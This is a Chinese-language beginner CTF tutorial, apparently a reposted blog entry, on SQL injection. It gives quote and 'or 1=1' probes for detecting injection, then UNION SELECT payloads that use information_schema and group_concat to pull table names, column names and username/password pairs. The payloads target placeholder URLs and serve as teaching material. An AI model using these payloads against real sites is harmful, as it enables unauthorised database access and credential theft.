首页 > 数据库 >Ctfer-Sql注入从0到0.1

Ctfer-Sql注入从0到0.1

时间:2024-02-01 16:12:46浏览次数:48  
标签:www asp 回显 0.1 xxx Ctfer Sql table com

一、判断是否存在sql注入漏洞

1.单引号判断

http://www.xxx.com/xxx.asp?id=10' 如果出现错误提示 you have an error in your sql syntax

则该网站可能就存在注入漏洞。

二、判断注入类型 字符型 and 数字型

数字型:

Or判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)
    http://www.xxx.com/xxx.asp?id=-1 or 1=1(页面正确无返回报错)
    http://www.xxx.com/xxx.asp?id=-1 or 1=2 (页面错误返回报错)

字符型:
http://www.xxx.com/xxx.asp?id=-1'or ‘1’=‘1(页面正确无返回报错)
    http://www.xxx.com/xxx.asp?id=-1'or ’1‘=’2 (页面错误返回报错)

三、万能密码(https://blog.csdn.net/zhhhb1005/article/details/124076314)

四、页面有回显 使用union联合注入

首先利用 union select 1,2,3 --+ (注意要执行union后的语句,前句必须为假) 确定回显位置

查库名 database()                     (group_concat函数可以依次输出想要的数据,中间用逗号分隔)

查表名 注入语句: 将一个数字改成group_concat(table_name) 后一个数字(不去掉)后加 from information_schema.tables where table_schema = '表名' --+

查表中column : table 改column  and table_schema 改 table_name

查数据名 group_concat(user_name) password(两个数据名) ,4 from user(表名)

(实例:union select 1,2,group_concat(username,0x7e,password) from users --+  这样做可以用0x7e分割两个数据 得到flag)

五、布尔盲注 和 时间盲注

布尔盲注:输入正确内容有正确回显或者有错误回显

时间盲注:完全没有回显

标签:www,asp,回显,0.1,xxx,Ctfer,Sql,table,com
From: https://www.cnblogs.com/heck1ng/p/18001465

相关文章

  • MySQL的安装目录。
    1.MySQL安装完成后,会在磁盘上生成一个目录,该目录就被称为MySQL的安装目录。主目录下面有一些子目录,为了更好的使用MySQL数据库,需要了解各级目录的功能2.目录结构如下:1)bin文件夹:用于放置一些可执行文件.exe,如mysql.exe,mysqld.exe 2)include文件夹用于放置一些头文件.......
  • sql中直接导出为csv
    导出为csvselectm.SETL_IDfrom(selectSETL_IDfromychlunionselect'SETL_ID')morderbym.SETL_IDdescintooutfile'E:/xy/file0.csv'fieldsterminatedby','optionallyenclosedby'"'escapedby'"......
  • SQL PARTITION BY 语句把一张表分组后的最大值或最小值插入另一张表里
    1.例子见前一章,目的是有分组的,只显示OrderAmount最高的(即每组只显示一列) 2.再建一个表来存储CREATETABLE[dbo].[MaxOrders]([orderid][int]NULL,[Orderdate][date]NULL,[CustomerName][varchar](100)NULL,[Customercity][varchar](100)NULL,......
  • Windows下修改MySQL密码。
    1.win+r  cmd回车 2.cd+MySQL中bin的路径,切换到mysql中 3.通过mysql-u用户名-p指定root用户登录mysql,回车后会提示输入密码,此时输入的是原来的旧密码 4.修改MySQL的用户密码,格式:setpasswordfor用户名@localhost=password('新密码');修改成root如下: 出......
  • 在Visual Studio中部署GDAL库的C++版本(包括SQLite、PROJ等依赖)
      本文介绍在VisualStudio软件中配置、编译C++环境下GDAL库、SQLite环境与PROJ库的详细方法。  GDAL库是一个非常方便的地理数据处理库,但其在C++环境下的配置与编译流程较为复杂;尤其是最新的GDAL3及以上版本,其在C++环境中的配置更是首先需要满足许多其他的环境配置条件(包括......
  • Mysql基础(网安)
    SQL语言入门创建数据库单行注释:##多行注释:/**/createtablet_student(snoint(6),snamevarchar(5),sexchar(1),ageint(3),enterdatedate,classnamevarchar(10),emailvarchar(15));查看表的结构,展示表的详细信息desct_stu......
  • 利用MYSQL+redis模拟消息队列
    1、插入数据库,获取自动编号,作为redis键名:functiontianjia(){$model=model(MqModel::class);$data=['rs'=>1];$model->insert($data);//插入$id=$model->getInsertID();pp($id);$key......
  • Linux 安装 Mariadb(MySQL)
    使用如下命令查询当前linux发行版的信息:lsb_release-a接着安装Mariadb,命令:aptinstallmariadb-servermariadb-client安装 Mariadb之后依旧是使用mysql命令,它是mysql的分支而已设置root密码,执行:sudomysql_secure_installation然后提示Setrootpassword?[Y/n],输入Y......
  • Flink CDC引起的Mysql元数据锁
    记一次FlinkCDC引起的Mysql元数据锁事故,总结经验教训。后续在编写FlinkCDC任务时,要处理好异常,避免产生长时间的元数据锁。同时出现生产问题时要及时排查,不能抱有侥幸心理。1、事件经过某天上午,收到系统的告警信息,告警提示:同步Mysql的某张表数据到Elasticsearch异常,提示连不......
  • 虹科分享 | Redis与MySQL协同升级企业缓存
    传统的MySQL数据库在处理大规模应用时已经到了瓶颈,RedisEnterprise怎样助力突破这一瓶颈?RedisEnterprise与MYSQL共同用作企业级缓存或副本数据库,会产生什么样的火花?二者联合的解决方案,如何加速应用程序,提升效率,实现可拓展性?使用RedisEnterprise与MYSQL共同用作企业级缓存或副......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99